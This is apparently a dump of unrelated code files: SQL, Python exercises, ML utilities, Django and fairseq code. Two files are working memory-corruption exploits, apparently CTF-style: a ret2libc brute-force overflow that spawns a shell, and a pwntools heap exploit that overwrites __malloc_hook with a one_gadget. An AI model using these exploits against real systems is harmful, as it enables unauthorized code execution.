22,457 | 36691b35815c1ce4df2208ebacb2277c52f000ba | =======================================================
#####################
### Original Python2 File:
### union.py2
#####################
#!/usr/bin/env python2.py
for i in range(10):
print i,
print
sql:
CREATE TABLE Customers (
name VARCHAR(100) ,
last VARCHAR(15),
phone int
)
INSERT INTO Customers VALUES ('Phil', 'Cannata', 7735647)
INSERT INTO Customers VALUES ('Matthew', 'Clarkson', 9875643)
INSERT INTO Customers VALUES ('Joaquin', 'Casares', 3451878)
INSERT INTO Customers VALUES ('Joaquin', 'Joaquin', 9345879)
INSERT INTO Customers VALUES ('Miggh', 'Tyfine', 124967)
INSERT INTO Customers VALUES ('Joaquin', 'Joaquin', 5123789)
INSERT INTO Customers VALUES ('Joaquin', 'Guadalupe', 8845748)
CREATE TABLE new_Customers (
name VARCHAR(100),
last VARCHAR(15),
phone int,
birthday int
)
INSERT INTO new_Customers VALUES ('Lake', 'Travis', 911, 1)
INSERT INTO new_Customers VALUES ('Absente', 'Mee', 302740, 8)
INSERT INTO new_Customers VALUES ('Burbple', 'Durple', 8837232, 7)
INSERT INTO new_Customers VALUES ('Hes', 'ABob', 8675309, 2)
INSERT INTO new_Customers VALUES ('See', 'Mee', 302740, 1)
INSERT INTO new_Customers VALUES ('Matthew', 'Clarkson', 9875643, 5)
INSERT INTO new_Customers VALUES ('Jose', 'Nosey', 928223, 2)
INSERT INTO new_Customers VALUES ('Miggh', 'Tyfine', 124967, 2)
SELECT * FROM Customers
UNION
SELECT * FROM new_Customers
SELECT name, last FROM Customers
UNION
SELECT name, last, phone FROM new_Customers
SELECT name, last, phone FROM Customers
UNION
SELECT name, last FROM new_Customers
SELECT name, phone FROM Customers
UNION
SELECT name, last FROM new_Customers
SELECT name, last FROM Customers
UNION
SELECT birthday, last FROM new_Customers
SELECT name, last FROM Customers
UNION
SELECT name, last FROM new_Customers
:sql
list = sql:
SELECT name, last, phone FROM Customers
UNION
SELECT name, last, phone FROM new_Customers
:sql
print list
#sql:
SELECT last, name FROM Customers
UNION
SELECT last, name FROM new_Customers
:sql
=======================================================
### Converted Python File:
#!/usr/bin/env python2.py
for i in range(10):
print i,
print
[['Phil', 'Cannata'], ['Matthew', 'Clarkson'], ['Joaquin', 'Casares'], ['Joaquin', 'Joaquin'], ['Miggh', 'Tyfine'], ['Joaquin', 'Joaquin'], ['Joaquin', 'Guadalupe'], ['Lake', 'Travis'], ['Absente', 'Mee'], ['Burbple', 'Durple'], ['Hes', 'ABob'], ['See', 'Mee'], ['Jose', 'Nosey']]
list = [['Phil', 'Cannata', 7735647], ['Matthew', 'Clarkson', 9875643], ['Joaquin', 'Casares', 3451878], ['Joaquin', 'Joaquin', 9345879], ['Miggh', 'Tyfine', 124967], ['Joaquin', 'Joaquin', 5123789], ['Joaquin', 'Guadalupe', 8845748], ['Lake', 'Travis', 911], ['Absente', 'Mee', 302740], ['Burbple', 'Durple', 8837232], ['Hes', 'ABob', 8675309], ['See', 'Mee', 302740], ['Jose', 'Nosey', 928223]]
print list
#
=======================================================
### Console Output:
SQL: each SELECT statement within the UNION must have the same number of columns.
SQL: each SELECT statement within the UNION must have the same number of columns.
SQL: each SELECT statement within the UNION must have the same number of columns.
SQL: each SELECT statement within the UNION must have columns of the same data types in the same order.
SQL: each SELECT statement within the UNION must have columns of the same data types in the same order.
0 1 2 3 4 5 6 7 8 9
[['Phil', 'Cannata', 7735647], ['Matthew', 'Clarkson', 9875643], ['Joaquin', 'Casares', 3451878], ['Joaquin', 'Joaquin', 9345879], ['Miggh', 'Tyfine', 124967], ['Joaquin', 'Joaquin', 5123789], ['Joaquin', 'Guadalupe', 8845748], ['Lake', 'Travis', 911], ['Absente', 'Mee', 302740], ['Burbple', 'Durple', 8837232], ['Hes', 'ABob', 8675309], ['See', 'Mee', 302740], ['Jose', 'Nosey', 928223]]
|
22,458 | 369cc76c93e2490c3112b33ef5f388045a7b8b7b | import numpy as np
import argparse
import random
import datetime
from state import State, HOLE
from costs import ones_cost, get_linear_rank_cost
from state_search import alphabeta
import progressbar
from pyswarm import pso
# Command-line configuration for the PSO heuristic-tuning run.
# Note: all arguments are positional-optional (nargs='?'), so they must be
# supplied in order: width height depth iterations swarmsize processes.
parser = argparse.ArgumentParser(description='Game options.')
parser.add_argument('width', nargs='?', help='Field width', default=4, type=int)
parser.add_argument('height', nargs='?', help='Field height', default=4, type=int)
parser.add_argument('depth', nargs='?', help='Tree search depth', default=3, type=int)
parser.add_argument('iterations', nargs='?', help='PSO iterations', default=10, type=int)
parser.add_argument('swarmsize', nargs='?', help='PSO swarmsize', default=12, type=int)
parser.add_argument('processes', nargs='?', help='Number of processes', default=12, type=int)
args = parser.parse_args()
# Unpack into module-level globals; f() below reads width/height/depth directly.
width = args.width
height = args.height
depth = args.depth
iterations = args.iterations
swarmsize = args.swarmsize
processes = args.processes
def compare_costs(cost1, cost2, rounds=1, depth=5, width=4, height=4):
    """Play `rounds` self-play games between two cost heuristics.

    Player 1 uses `cost1`, player 2 uses `cost2`; the side that moves
    first alternates every round to remove first-move bias. A round is
    counted as a win when the terminal state's `ones_cost` is positive.

    Returns the fraction of rounds won (0.0 .. 1.0).
    """
    wins = 0
    progress = progressbar.ProgressBar()
    for round_idx in progress(range(rounds)):
        state = State(width, height)
        # swap the starting player on odd rounds
        if round_idx % 2:
            state.player = 3 - state.player
        while not state.is_terminal():
            active_cost = cost1 if state.player == 1 else cost2
            candidate_indices = alphabeta(state, depth, active_cost)[1]
            # pick uniformly among the equally-best successor states
            state = state.expand_state()[random.choice(candidate_indices)]
        #state.draw()
        wins += ones_cost(state) > 0
    return wins / rounds
def h_score(cost, rounds, depth, width, height):
    """Win rate of `cost` when matched against the baseline `ones_cost`."""
    return compare_costs(
        cost, ones_cost, rounds=rounds, depth=depth, width=width, height=height
    )
def f(x):
    """PSO objective: negated win rate of the linear-rank cost encoded by
    the flat particle vector `x`.

    `x` is reshaped to the (height, width) board grid; each cell weight is
    keyed by its (row, col) coordinate. Reads the module-level globals
    `height`, `width` and `depth`. Negated because pyswarm minimizes.
    """
    grid = x.reshape(height, width)
    cell_weights = {
        (row, col): grid[row, col]
        for row in range(grid.shape[0])
        for col in range(grid.shape[1])
    }
    win_rate = h_score(get_linear_rank_cost(cell_weights), 100, depth, width, height)
    return -win_rate
# Optimize the cell weights with particle-swarm optimization over the range
# [-1, 2] per cell, then persist the best particle as a timestamped .npy file.
x = pso(f, -1 * np.ones(height * width), 2 * np.ones(height * width), maxiter=iterations, debug=True, swarmsize=swarmsize, processes=processes)[0]
date = datetime.datetime.now()
# e.g. ./4x4_2024_01_31_23_59_59
filename = './%dx%d_%.4d_%.2d_%.2d_%.2d_%.2d_%.2d' % (width, height, date.year, date.month, date.day, date.hour, date.minute, date.second)
np.save(filename, x)
|
22,459 | ebc34da879390a6392754cd4af0632e1e6247444 | """
while True:
num1 = int(input("Ingrese un número: "))
if num1 >= 10 and num1 <= 20:
break
while True:
num2 = int(input("Ingrese un número: "))
if num2 >= 10 and num2 <= 20:
break
while True:
num3 = int(input("Ingrese un número: "))
if num3 >= 10 and num3 <= 20:
break
while True:
num4 = int(input("Ingrese un número: "))
if num4 >= 10 and num4 <= 20:
break
vector = num1, num2, num3, num4
suma = 0
for i in range(0, 4):
if vector[i] == 14:
suma = suma + 1
print(f"El número 14 aparece en el vector {suma} veces")
print()
a = ("casa", "carro", "beca")
b = ("amarillo", "azul", "rojo")
for tipo, color in zip(a, b):
print(tipo, color)
"""
# Read four integers, each validated to lie in [10, 20], then report how
# many of them equal 14. Replaces four copy-pasted read-validate loops
# with a single loop, and the manual counting pass with list.count().
lista = []
for _ in range(4):
    # Re-prompt until the user supplies an in-range value.
    while True:
        valor = int(input("Ingrese un número: "))
        if 10 <= valor <= 20:
            break
    lista.append(valor)

suma = lista.count(14)
print(f"El número de veces que se repite el número 14 es {suma}")
22,460 | 0e236d5c8c84eb5bd7e7cbdbe901cd0cb680f7d9 | class solution(object):
'''
Given a digit string, return all possible letter combinations that the number could represent.
'''
def letterCombinations(self, digits):
'''
each element in the returned list represents the input digits.
parse digit one by one. Store corresponding string for all parsed digits.
:param digits: digits string, '123'
:return:
'''
# dict hold digit to string mapping
mappings = {
'2':'abc',
'3':'def',
'4':'ghi',
'5':'jkl',
'6':'mno',
'7':'pqrs',
'8':'tuv',
'9':'wxyz'
}
prev = ['']
for d in digits:
# create new results when adding new digit
tmp = []
for x in prev:
for y in mappings[d]:
tmp.append(x+y)
prev = tmp
return prev
if __name__ == '__main__':
    # Demo: print all keypad combinations for '234'.
    sol = solution()
    digits = '234'
    # print() call form is valid on both Python 2 and Python 3; the original
    # `print expr` statement is a syntax error under Python 3.
    print(sol.letterCombinations(digits))
22,461 | e55509732b5c22c71948702fc241111b56ae3440 | import tensorflow as tf
# Demo of TensorFlow 1.x variable naming: tf.Variable always creates a new
# variable (auto-uniquified name), while tf.get_variable enforces unique names
# and tf.variable_scope namespaces them.
var1 = tf.Variable(1.0,name='firstvar')
print('var1:',var1.name)
# Same requested name -> TF appends a suffix ('firstvar_1') instead of reusing.
var1 = tf.Variable(2.0,name='firstvar')
print('var1:',var1.name)
# Unnamed variables get an auto-generated 'Variable[_N]' name.
var2 = tf.Variable(3.0)
print('var2:',var2.name)
var2 = tf.Variable(4.0)
print('var2:',var2.name)
get_var1 = tf.get_variable(name='firstvar',shape=[1],dtype=tf.float32,initializer=tf.constant_initializer(0.3))
print('get_var1:',get_var1.name)
get_var1 = tf.get_variable(name='firstvar1',shape=[1],dtype=tf.float32,initializer=tf.constant_initializer(0.4))
print('get_var1:',get_var1.name)
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    # Note: var1/var2 print the values of the *last* Variable bound to each
    # Python name; the earlier Variables still exist in the graph.
    print('var1=',var1.eval())
    print('var2=',var2.eval())
    print('get_var1=',get_var1.eval())
# Assigning the same name twice via tf.get_variable raises an error:
# get_var1 = tf.get_variable(name='a',shape=[1],dtype=tf.float32,initializer=tf.constant_initializer(0.3))
# print('get_var1:',get_var1.name)
# get_var2 = tf.get_variable(name='a',shape=[1],dtype=tf.float32,initializer=tf.constant_initializer(0.4))
# print('get_var1:',get_var1.name)
# variable_scope separates variables into distinct namespaces, so the same
# get_variable name can be reused under different scopes.
import tensorflow as tf
with tf.variable_scope('test1'):
    get_var1 = tf.get_variable(name='firstvar',shape=[2],dtype=tf.float32)
with tf.variable_scope('test2'):
    get_var2 = tf.get_variable(name='firstvar',shape=[2],dtype=tf.float32)
# Prints scoped names: 'test1/firstvar:0' and 'test2/firstvar:0'.
print('get_var1:',get_var1.name)
print('get_var2:',get_var2.name)
22,462 | f2cfc957fa513325eea1b987290ad4fae068d2be | # coding=utf-8
import pandas as pd
from align.align_tools import load_boundaries
class AlignMender(object):
    """Adjusts phone-boundary times in forced alignments based on a triple of
    classifier predictions per boundary (before / at / after the boundary)."""

    @staticmethod
    def mend(aligns_dict, predictions, bound_info):
        """
        Mend aligns by input params.
        :param aligns_dict:
        :param predictions:
        :param bound_info:
            list: [(align_name, bound_index, time), ...]
        :return:
            new_align_dict: a mended dict correspond to align_dict
            bound_dict:
            bound_count:
            bound_moved:
            move_dist_mean: move_dist_sum/bound_moved
        """
        wav_names, bound_indices, times = zip(*bound_info)
        print('bound_info length: %d' % len(bound_info))
        print('predictions length: %d' % len(predictions))
        # One row per (boundary, probe-position); predictions is assumed to be
        # parallel to bound_info -- NOTE(review): confirm caller guarantees this.
        df = pd.DataFrame({'wav_names': wav_names, 'bound_indices': bound_indices,
                           'times': times, 'predictions': predictions})
        bound_dict = load_boundaries(aligns_dict)
        bound_count = 0
        bound_moved = 0
        move_dist_sum = 0
        # Grouping by the external wav_names/bound_indices sequences (not by
        # DataFrame columns); each group is one boundary with its 3 probes.
        for (name, idx), group in df[['predictions', 'times']].groupby([wav_names, bound_indices]):
            preds = list(group.iloc[:, 0])
            # exactly three probe predictions expected per boundary
            assert len(preds) == 3
            '''judge three predictions, decide new boundary time and frame distance'''
            old_time, last_phone, next_phone, old_frame_dist = bound_dict[name][idx]
            '''make new boundaries'''
            new_time, new_frame_dist, moved, move_dist = AlignMender.__update_boundary(preds, old_frame_dist, old_time)
            bound_dict[name][idx] = (new_time, last_phone, next_phone, new_frame_dist)
            '''statistic move info'''
            if moved:
                bound_moved += 1
                move_dist_sum += move_dist
            bound_count += 1
        move_dist_mean = move_dist_sum/bound_moved if bound_moved != 0 else 0
        '''refresh boundaries of align_dict'''
        new_align_dict = AlignMender.__apply_boundaries(aligns_dict, bound_dict)
        return new_align_dict, bound_dict, bound_count, bound_moved, move_dist_mean

    @staticmethod
    def __update_boundary(preds, old_frame_dist, old_time, fs=16000):
        """
        Judge three predictions, decide new boundary time and frame distance
        :param preds: the three probe predictions (each 0, 1 or 2)
        :param old_frame_dist: current probe spacing, in samples
        :param old_time: current boundary time, in seconds
        :param fs: frequency of sampling (default 16 kHz)
        :return:
            new_time,
            new_frame_dist
            moved,
            move_dist
        """
        assert len(preds) == 3
        new_frame_dist = old_frame_dist
        new_time = old_time
        moved = False
        move_dist = None
        # Monotone prediction patterns -> (new_time, new_frame_dist) rules.
        # Moves right when all probes predict "before" (0s), left for "after"
        # (2s), and halves the search step when the transition is bracketed.
        func_map = {
            '0-0-0': lambda t, d: (t+2*d/fs, d),
            '0-0-1': lambda t, d: (t+d/fs, d),
            '0-0-2': lambda t, d: (t+d/(fs*2), d/2),
            '0-1-2': lambda t, d: (t, d/2),
            '0-2-2': lambda t, d: (t-d/(fs*2), d/2),
            '1-2-2': lambda t, d: (t-d/fs, d),
            '2-2-2': lambda t, d: (t-d/(fs*2), d),
        }
        key = '{}-{}-{}'.format(*preds)
        # Non-monotone patterns are left untouched (moved=False, move_dist=None).
        if key in func_map.keys():
            new_time, new_frame_dist = func_map[key](old_time, old_frame_dist)
            moved = True
            move_dist = new_time-old_time
        return new_time, new_frame_dist, moved, move_dist

    @staticmethod
    def __apply_boundaries(aligns_dict, bound_dict):
        # Push the (possibly moved) boundaries back into each alignment object;
        # set_boundaries mutates in place, so the same dict is returned.
        for k in aligns_dict.keys():
            aligns_dict[k].set_boundaries(bound_dict[k])
            # aligns_dict[k] = aligns_dict[k].set_boundaries(bound_dict[k])
        return aligns_dict
|
22,463 | 24d73315a435237a694f2b74c155b8552bb81cd8 | #!/usr/bin/python3
"""
unit tests for the bot library
"""
import pytest
import bot
@pytest.mark.parametrize("strategy, l, expected", [
    (bot.longest, ["something", "something else", "four score and seven years ago"], "four score and seven years ago"),
    (bot.shortest, ["something", "something else", "four score and seven years ago"], "something"),
])
def test_strat(strategy, l, expected):
    """Each selection strategy picks the expected string from the candidates.

    Covers bot.longest and bot.shortest; the strategies take the candidate
    strings as positional varargs, hence the unpacking.
    """
    assert strategy(*l) == expected
|
22,464 | f889d7e66bf7bd2b2dd2647cf64cdfe91189052e | # 操作列表, 一般包括 增删改查
# Demo of list operations: add, delete, look up and modify (CRUD).
heroes = ['镜', '嬴政', '露娜', '娜可露露']
# --- Ways to add elements ---
# append: append a single element at the end of the list
heroes.append('黄忠')
print(heroes)  # appended at the tail
# insert(index, object): insert at the given position
heroes.insert(1, '小乔')
print(heroes)
newHeroes = ['狄仁杰', '王昭君']
# extend(iterable): append every element of an iterable
heroes.extend(newHeroes)
print(heroes)
# --- Removing elements: pop ---
print(heroes)  # ['镜', '小乔', '嬴政', '露娜', '娜可露露', '黄忠', '狄仁杰', '王昭君']
x = heroes.pop()  # remove and return the last element
print(x)  # 王昭君
x = heroes.pop(2)  # remove the element at the given index
print(x)  # 嬴政
print(heroes)  # ['镜', '小乔', '露娜', '娜可露露', '黄忠', '狄仁杰']
# remove: delete by value
heroes.remove('小乔')  # removing a missing value raises ValueError
print(heroes)  # ['镜', '露娜', '娜可露露', '黄忠', '狄仁杰']
# The del keyword is powerful but rarely preferred for list deletion
del heroes[2]
print(heroes)  # ['镜', '露娜', '黄忠', '狄仁杰']
# clear: empty the list
heroes.clear()
print(heroes)  # []
# --- Look-ups ---
heroes = ['镜', '小乔', '镜', '露娜', '娜可露露', '黄忠', '狄仁杰']
print(heroes.index('镜'))  # returns the first index; missing value raises ValueError
print(heroes.count('镜'))  # 2, number of occurrences
# the `in` operator tests membership
flag = '小乔' in heroes
print(flag)  # True
# --- Modifying: assign directly through the index ---
heroes[1] = '镜'
print(heroes)  # ['镜', '镜', '镜', '露娜', '娜可露露', '黄忠', '狄仁杰']
|
22,465 | 60900f2f4283bfe6ced108ad1f27aaf65f511546 | from subprocess import call
import struct
# ret2libc exploit for /usr/local/bin/ovrflw (32-bit, ASLR brute force).
# Chain layout after 112 padding bytes: system() -> exit() -> &"/bin/sh".
libc_base_addr = 0xb75ae000
system_off = 0x00040310
exit_off = 0x00033260
# NOTE(review): 0x000162bac has 9 hex digits -- likely a typo for 0x00162bac;
# confirm against the target libc's "/bin/sh" string offset.
arg_sh = 0x000162bac
system_addr = struct.pack("<I", libc_base_addr + system_off)
exit_addr = struct.pack("<I", libc_base_addr + exit_off)
arg_addr = struct.pack("<I", libc_base_addr + arg_sh)
buf = "A" * 112  # padding up to the saved return address
buf += system_addr
buf += exit_addr
buf += arg_addr
i = 0
while (i < 200):
    print("Try: %s" % i)
    # BUG FIX: original `i += i` never advances from 0 -> infinite loop;
    # increment by 1 so the brute force actually makes 200 attempts.
    i += 1
    ret = call(["/usr/local/bin/ovrflw", buf])
|
22,466 | d852c204e0e0a2004c27d110f87300f520e1909e | from pwn import *
def cmd(c):
    # Send menu command `c` once the prompt ending in "and:\n" appears.
    p.sendlineafter("and:\n",c)
def show(key):
    # GET: print the data stored under `key`.
    cmd("GET")
    p.sendlineafter("key:\n",key)
def show_all():
    # DUMP: list every stored key/value pair.
    cmd("DUMP")
def add(key,size,c="A"):
    # PUT: allocate `size` bytes under `key` and fill with `c` (NUL-padded).
    # size == 0 skips the data prompt entirely.
    cmd("PUT")
    p.sendlineafter("key:\n",key)
    p.sendlineafter("size:\n",str(size))
    if size!=0:
        p.sendafter("data:\n",c.ljust(size,'\x00'))
def free(key):
    # DEL: free the allocation stored under `key`.
    cmd("DEL")
    p.sendlineafter("key:\n",key)
# Heap exploit for PCTF plaiddb: chunk-shrink -> overlapping chunks -> libc
# leak -> fastbin dup over __malloc_hook -> one_gadget. Exact allocation
# sizes/order matter; do not reorder.
context.log_level='debug'
context.arch='amd64'
#libc=ELF('./bc.so.6')
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
p=process('./plaiddb')
# Groom the heap into the layout needed for the size-field overwrite.
add("0",0x18)
add("1",0x18)
add("2",0x18)
free("0")
free("1")
add("0",0x38)
add("1",0x400)
add("3",0x88)
add("4",0x38)
free("1")
add("1",0x88)
free("4")
add("4",0x18)
# Key contains an embedded NUL to shrink a freed chunk's size field.
add("n\x0032"*6,0x88,p64(0xdeadbeef))#shrink
free("2")
add("2",0x88)
free("n")
free("3")
# GET IT!
# Overlapping chunk: "9" covers freed metadata, leaking a main_arena pointer.
add("9",0x1b8,"OVERLAP")
add("LEAK",0x138,)
show("9")
p.readuntil("s]:\n")
# Offset pair is main_arena bin pointer -> libc base for this build.
base=u64(p.read(8))-(0x7ffff7dd1b78-0x7ffff7a0d000)
log.warning(hex(base))
# Fastbin double free: 0 -> 3 -> 0 via the overlapping chunk "9".
free("0")
add("0",0x68,"DOUBLEFREE")
add("3",0x68,"MID")
free("0")
free("3")
free("9")
libc.address=base
# Fake chunk at __malloc_hook-35 (0x7f size byte alignment trick).
add("0",0x68,p64(libc.sym['__malloc_hook']-35))
add("3",0x68)
add("6",0x68)
# Write one_gadget (0xf02a4) into __malloc_hook; realloc+12 as the hook hop.
add("9",0x68,"\x00"*11+p64(0xf02a4+base)+p64(12+libc.sym['realloc'])
)
gdb.attach(p,"b malloc")
# Trigger malloc -> hooked one_gadget -> shell.
cmd("PUT")
p.interactive('n132>')
|
22,467 | 78b0e54e7bc7f184f59aba6f5f97439111bee4e3 | receiverLineId = 'receiverLineId'
channelAccessToken = 'channelAccessToken' |
22,468 | c35de4ca3b45e54d9c7d5463b8beb70ef551110d | __author__ = 'pavel.kiselev'
from multiprocessing.dummy import Pool
def convert_to_list(structure_to_convert):
    """Flatten *structure_to_convert* into a sorted list.

    Each plain dict element is replaced by the value stored under its first
    key; every other element is kept as-is. If the elements are mutually
    unsortable a message is printed and the list is returned unsorted.
    """
    converted = []
    for element in structure_to_convert:
        if type(element) is dict:
            first_key = list(element)[0]
            converted.append(element[first_key])
        else:
            converted.append(element)
    try:
        converted.sort()
    except TypeError:
        print('Raised TypeError during list sorting')
    return converted
def convert_to_set(list_to_convert):
    """Collapse *list_to_convert* into a set.

    Each plain dict element contributes the value stored under its first
    key; every other element is added directly.
    """
    return {
        element[list(element)[0]] if type(element) is dict else element
        for element in list_to_convert
    }
def parallel_convert_to_set(table_dicts):
    """Convert each table in *table_dicts* to a set via convert_to_set,
    using a 2-worker thread pool (multiprocessing.dummy).

    Fix: the pool is now closed/joined in a finally block so worker threads
    are not leaked if convert_to_set raises inside map().
    """
    pool = Pool(2)
    try:
        table_sets = pool.map(convert_to_set, table_dicts)
    finally:
        pool.close()
        pool.join()
    return table_sets
|
22,469 | 5b6b3ea063ed2c2590f3d3af7a330f5e4fd22107 | # runCase.py:运行测试用例(1)运行前会根据配置文件里面配置的是否清空前面的运行结果,如果配置是0,result下面就会保存每次的运行结果,如果配置为1,就会保存最后一次运行结果(就是运行前,把result里面的各个项下面的内容清空了)(2)运行前会去调用caseList.txt,如果里面带#的测试用例文件名称不执行(3)运行后,会自动生成html的报告,并跟进配置文件里面的邮箱配置发送测试结果文件,邮件函数具体编写,请参考我另一篇文章
|
22,470 | 06ff52fffd389a846f2284daba5b581bca41f0c1 | # Python script with classes for the two tables used in our Postgres DB
from . import db
# Expense class object, used to query and insert data in expenses table
class Expense(db.Model):
    """ORM model for the `expenses` table: one row per budgeted expense."""
    __tablename__ = 'expenses'
    expenseid = db.Column('expenseid',db.Integer,primary_key=True)  # surrogate PK
    category = db.Column('category',db.String(50))
    amount = db.Column('amount',db.Numeric(8,2))  # currency, 2 decimal places
    duedate = db.Column('duedate',db.Date)
    status = db.Column('status',db.String(50))
    # month stored as text and year as int -- presumably for simple filtering;
    # NOTE(review): confirm month naming convention matches Payment.month
    month = db.Column('month',db.String(50))
    year = db.Column('year',db.Integer)
# Paymenty class object, used to query and insert data in payments table
class Payment(db.Model):
    """ORM model for the `payments` table: one row per roommate payment."""
    __tablename__ = 'payments'
    paymentid = db.Column('paymentid',db.Integer,primary_key=True)  # surrogate PK
    roommatename = db.Column('roommatename',db.String(50))
    category = db.Column('category',db.String(50))
    amount = db.Column('amount',db.Numeric(8,2))  # currency, 2 decimal places
    paymentdate = db.Column('paymentdate',db.Date)
    status = db.Column('status',db.String(50))
    month = db.Column('month',db.String(50))
    year = db.Column('year',db.Integer)
|
22,471 | cfb8ddf1702ff72576f3abdee35a2be9924c3bdf | # Generated by Django 2.1.3 on 2018-12-25 14:11
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration for the workdays app (auto-generated by Django;
    creates HolidayName, SpecialDay and the WorktimeStandards proxy).
    Do not hand-edit beyond comments."""

    initial = True

    dependencies = [
    ]

    operations = [
        # Holiday definitions: name plus a month/day anchor and duration.
        migrations.CreateModel(
            name='HolidayName',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('dayname', models.CharField(max_length=150, verbose_name='Название')),
                ('month', models.IntegerField(default=1, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(12)], verbose_name='Месяц')),
                ('day', models.IntegerField(default=1, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(31)], verbose_name='День')),
                ('count', models.IntegerField(default=1, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(10)], verbose_name='Число дней')),
            ],
            options={
                'verbose_name': 'наименование праздника',
                'verbose_name_plural': 'наименования праздников',
                'ordering': ('month', 'day'),
            },
        ),
        # Calendar exceptions: a dated day-off / short day / working day.
        migrations.CreateModel(
            name='SpecialDay',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date', models.DateField(db_index=True, unique=True, verbose_name='Дата')),
                ('daytype', models.CharField(choices=[('HL', 'Выходной день'), ('SH', 'Сокращенный день'), ('WK', 'Рабочий день')], default='HL', max_length=2, verbose_name='Тип дня')),
                ('comment', models.TextField(blank=True, null=True, verbose_name='Комментарий')),
                ('dayname', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to='workdays.HolidayName', verbose_name='Название')),
            ],
            options={
                'verbose_name': 'нестандартный день календаря',
                'verbose_name_plural': 'нестандартные дни календаря',
                'ordering': ('date',),
            },
        ),
        # Read-only proxy over SpecialDay (view permission only, no new table).
        migrations.CreateModel(
            name='WorktimeStandards',
            fields=[
            ],
            options={
                'verbose_name': 'норма рабочего времени',
                'verbose_name_plural': 'нормы рабочего времени',
                'proxy': True,
                'default_permissions': ('view',),
                'indexes': [],
            },
            bases=('workdays.specialday',),
        ),
    ]
|
22,472 | 575d2a3daa6d615e935dc647248385d3366d3361 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import math
from typing import Any, Dict, List, Optional
import torch
import torch.nn as nn
from fairseq import utils
from fairseq.distributed import fsdp_wrap
from fairseq.models import FairseqIncrementalDecoder
from fairseq.models.transformer import TransformerConfig
from fairseq.modules import (
AdaptiveSoftmax,
BaseLayer,
FairseqDropout,
LayerDropModuleList,
LayerNorm,
PositionalEmbedding,
SinusoidalPositionalEmbedding,
)
from fairseq.modules import transformer_layer
from fairseq.modules.checkpoint_activations import checkpoint_wrapper
from fairseq.modules.quant_noise import quant_noise as apply_quant_noise_
from torch import Tensor
import numpy as np
# rewrite name for backward compatibility in `make_generation_fast_`
def module_name_fordropout(module_name: str) -> str:
    """Map the refactored class name back to its legacy module name so
    dropout statistics keep their historical label; all other names pass
    through unchanged."""
    if module_name == "TransformerDecoderBase":
        return "TransformerDecoder"
    return module_name
class TransformerDecoderBase(FairseqIncrementalDecoder):
    """
    Transformer decoder consisting of *cfg.decoder.layers* layers. Each layer
    is a :class:`TransformerDecoderLayer`.
    Args:
        args (argparse.Namespace): parsed command-line arguments
        dictionary (~fairseq.data.Dictionary): decoding dictionary
        embed_tokens (torch.nn.Embedding): output embedding
        no_encoder_attn (bool, optional): whether to attend to encoder outputs
            (default: False).
    """

    def __init__(
        self,
        cfg,
        dictionary,
        embed_tokens,
        no_encoder_attn=False,
        output_projection=None,
    ):
        self.cfg = cfg
        super().__init__(dictionary)
        self.register_buffer("version", torch.Tensor([3]))
        # lazily (re)built causal mask cache; see buffered_future_mask
        self._future_mask = torch.empty(0)
        self.dropout_module = FairseqDropout(
            cfg.dropout, module_name=module_name_fordropout(self.__class__.__name__)
        )
        self.decoder_layerdrop = cfg.decoder.layerdrop
        self.share_input_output_embed = cfg.share_decoder_input_output_embed
        input_embed_dim = embed_tokens.embedding_dim
        embed_dim = cfg.decoder.embed_dim
        self.embed_dim = embed_dim
        self.output_embed_dim = cfg.decoder.output_dim
        self.padding_idx = embed_tokens.padding_idx
        self.max_target_positions = cfg.max_target_positions
        self.embed_tokens = embed_tokens
        # standard sqrt(d) embedding scaling unless disabled in the config
        self.embed_scale = 1.0 if cfg.no_scale_embedding else math.sqrt(embed_dim)
        if not cfg.adaptive_input and cfg.quant_noise.pq > 0:
            self.quant_noise = apply_quant_noise_(
                nn.Linear(embed_dim, embed_dim, bias=False),
                cfg.quant_noise.pq,
                cfg.quant_noise.pq_block_size,
            )
        else:
            self.quant_noise = None
        # optional projection when token-embedding dim != decoder dim
        self.project_in_dim = (
            Linear(input_embed_dim, embed_dim, bias=False)
            if embed_dim != input_embed_dim
            else None
        )
        self.embed_positions = (
            PositionalEmbedding(
                self.max_target_positions,
                embed_dim,
                self.padding_idx,
                learned=cfg.decoder.learned_pos,
            )
            if not cfg.no_token_positional_embeddings
            else None
        )
        if cfg.layernorm_embedding:
            self.layernorm_embedding = LayerNorm(embed_dim, export=cfg.export)
        else:
            self.layernorm_embedding = None
        self.cross_self_attention = cfg.cross_self_attention
        # LayerDrop wrapper randomly skips layers at train time
        if self.decoder_layerdrop > 0.0:
            self.layers = LayerDropModuleList(p=self.decoder_layerdrop)
        else:
            self.layers = nn.ModuleList([])
        self.layers.extend(
            [
                self.build_decoder_layer(cfg, no_encoder_attn)
                for _ in range(cfg.decoder.layers)
            ]
        )
        self.num_layers = len(self.layers)
        if cfg.decoder.normalize_before and not cfg.no_decoder_final_norm:
            self.layer_norm = LayerNorm(embed_dim, export=cfg.export)
        else:
            self.layer_norm = None
        self.project_out_dim = (
            Linear(embed_dim, self.output_embed_dim, bias=False)
            if embed_dim != self.output_embed_dim and not cfg.tie_adaptive_weights
            else None
        )
        self.adaptive_softmax = None
        self.output_projection = output_projection
        if self.output_projection is None:
            self.build_output_projection(cfg, dictionary, embed_tokens)
        # DeepNet-style weight rescaling, opt-in via a `deepnet` config flag
        if utils.safe_getattr(cfg, 'deepnet', False):
            self.rescale_decoder_only_parameters(cfg)

    def rescale_decoder_only_parameters(self, cfg):
        """Multiply selected per-layer weights (self-attn out/v projections
        and both FFN matrices) by sqrt(log(2N)).
        NOTE(review): `cfg` is accepted but unused here -- confirm intended.
        """
        def rescale(param, layer_id):
            param.mul_(math.sqrt(math.log(len(self.layers) * 2)))
            # param.div_(math.sqrt(2.0 * layer_id))

        for layer_id in range(len(self.layers)):
            layer = self.layers[layer_id]
            rescale(layer.self_attn.out_proj.weight.data, layer_id + 1)
